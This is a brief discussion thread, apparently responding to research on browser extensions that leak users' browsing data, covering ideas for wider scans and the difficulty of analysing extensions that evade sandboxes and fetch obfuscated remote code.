I’ve always thought that it’s crazy how so many extensions can basically read the content of the webpages your browse. I’m wondering if the research should go further: find all extensions that have URLs backed in them or hashes (of domains?) then check what they do when you visit these URLs
Without any doubt the research could continue on this. We had many opportunities to make the scan even wider and almost certainly we would uncover more extensions. The number of leaking extensions should not be taken as definite.
There are resource constrains. Those extensions try to actively detect if you are in developer mode. Took us a while to avoid such measures and we are certain we missed many extensions due to for example usage of Docker container. Ideally you want to use env as close to the real one as possible.
Without infrastructure this doesn't scale.
The same goes for the code analysis you have proposed. There are already tools that do that (see Secure Annex). Often the extensions download remote code that is responsible for data exfiltration or the code is obfuscated multiple times. Ideally you want to run the extension in browser and inspect its code during execution.